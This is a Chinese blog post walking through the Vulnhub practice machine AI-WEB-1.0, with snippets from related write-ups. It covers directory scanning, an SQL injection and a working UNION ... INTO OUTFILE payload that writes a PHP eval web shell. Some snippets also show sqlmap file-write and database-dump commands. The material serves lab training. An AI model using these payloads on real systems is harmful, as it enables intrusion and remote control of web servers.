AI-WEB-1.0攻略

最新推荐文章于 2024-10-05 14:16:38 发布
最新推荐文章于 2024-10-05 14:16:38 发布
阅读量143 收藏
点赞数 1
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/joker_in_here/article/details/141335419
版权

一.打开御剑2014寻找靶机,通过一个个的尝试得到靶机IP

二.利用爬虫robots.txt查看靶机目录

三.访问目录发现无法访问,但可以访问文件的上一级得到一个可以进行sql注入的点

四.利用kali虚拟机的dirsearch对目录进行扫描,得到一个PHP文件

五.对该文件进行访问,可以得到该网站的绝对路径,以此就可以把木马写进去

六.判断闭合方式为’,字段数为3

七.输入命令1'union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/sis.php'#把木马文件写入网站目录

八.查看木马文件是否成功写入网站

九.利用工具中国菜刀就可以对该网站进行操作

joker_in_here
关注
AI-Web-1.0靶场
qq_46187131的博客
03-27 1398
1.确认靶机IP 2.端口和目录扫描 3.使用SQLmap进行注入获取shell 4.使用openssl提权。
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4268
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2749
AI-WEB-1.0靶机的简单攻略
AI-WEB-1.0 靶机
weixin_53736204的博客
07-29 478
下载地址:下载压缩文件打开开启虚拟机。
AI-WEB-1.0详细教程
2301_76631050的博客
07-29 406
这里2.php存放在/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/下。Ctrl+f 搜索一下/m3diNf0/,发现了路径:/home/www/html/web1x443290o2sdf92213/我们需要一个可以上传文件的页面se3reTdir777/uploads/刚好符合 它的绝对目录为。我们接下来的思路是写入木马,但是需要一个可写入路径需要我们找一下。上面我们扫到的目录有好几个不能访问,我们需要深入对他们扫描一下。
VulnHub 靶机系列之AI-Web-1.0
2302_76838247的博客
09-10 1589
kali机下载地址(选择第一个下载,3G大小。
靶机通关|AI-WEB-1.0 靶机通关攻略
a96482的博客
07-30 756
python3 sqlmap.py -r '/home/kali/桌面/2.txt' --file-write --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php。python3 sqlmap.py -r '/home/kali/桌面/2.txt'--batch -D aiweb1 -T systemUser --dump。中发现提交框,开始尝试注入。写入成功,使用蚁剑连接。连接成功,通关完成。
Vulnhub靶机:AI-WEB-1.0
weixin_68416970的博客
05-22 1148
Vulnhub靶机:AI-WEB-1.0AI-WEB-1.0是一个专门设计用来测试渗透测试者技能的靶机。这个靶机的目标是从/root/flag.txt获取flag,获得低权限的shell,然后将权限提升到root。
AI-WEB-1.0靶机渗透教程 文件上传漏洞
qq_48368964的博客
07-29 241
简单的扫描目录 扫出来两个 分别进去看看发现里面有两个接着扫描下第一个目录 发现了info.php文件。
vulnhub之AI-Web-1.0
m_de_g的博客
04-27 694
linux。
vulnhub靶机AI-Web-1.0渗透笔记
liver100day的博客
06-10 2369
AI-Web1靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:AI-Web1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/ 渗透过程 1.信息收集 1.1 主机发现 netdiscover 使用这条命令来确认目标靶机IP地址 确认目标靶机IP地址:192.168.75.134 1.2 端口扫描 使用端口扫描神器nmap进行扫描 nmap -T4 -sV -O -A -P- 192.1
记录一次vulnhub:AI-WEB-1.0靶场复现
sszsNo1的博客
06-24 258
又得到俩个路径,再次扫描路径后有没有其他的目录,首先扫描/m3diNf0/目录。发现访问/se3reTdir777/uploads/时出现跟上面一样,于是我就尝试访问/se3reTdir777/输入4时,却发现没有次用户,根据上面的回显说明数据库有三个用户,接下来判断闭合。先访问/index.html目录,发现跟没扫之前一样。访问/m3diNf0/目录时,说没有权限,换下一个。接着访问另一个,发现跟上面一样,信息搜集就到这了。再访问另外一个,又出现俩个目录,接着访问。访问一下,结果发现什么都没有。
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6688
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
毕业设计_基于springboot+layui+mybatisPlus的中小型仓库物流管理系统源码+SQL+教程+可运行】41004
pingguocu3的博客
10-04 893
毕业设计--课程设计--springboot--java 登录管理员账号:system 密码:123456 验证码输入:注意验证码字母要大写。启动项目后运行http://locahost:8080跳转到登录界面即可。后端:springboot、mybatis-plus、shiro。application.yml文件中的数据库连接信息。运行sql目录下的warehouse.sql文件。1.基础管理:商品管理、客户管理、供应商管理;2.物流管理:进货管理、发货管理、交付管理...
实用SQL小总结
UntifA的博客
09-29 1512
SQL记录
PostgreSQL 字段使用pglz压缩测试
文牧之的博客
09-30 636
创建测试表1,并插入1000w行数据–创建测试表2,使用 pglz压缩字段,并插入1000w行数据对比表yewu1.test1和yewu1.test2的大小,没体现出压缩了。
PostgreSQL的WAL日志优化及验证
最新发布
Java_fenxiang的博客
10-05 655
在应用负载不变的情况下可以通过如下方法进行WAL优化登录后复制 1) 延长checkpoint时间间隔 FPI产生于checkpoint之后第一次变脏的page,在下次checkpoint到来之前,已经输出过FPI的page是不在需要再次输出FPI。因此checkpoint时间间隔越长,FPI产生的频度会越低。增大ch...
PostgreSQL常用数值处理函数简介
lunan的博客
10-04 549
这些数值处理函数提供了丰富的数值计算功能,从简单的数学操作到更高级的科学计算,满足了大多数数据库操作中的数值处理需求。
Leecode SQL 184. Department Highest Salary 找出tie
-
10-02 464
要找出 tie 的 highest salary!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值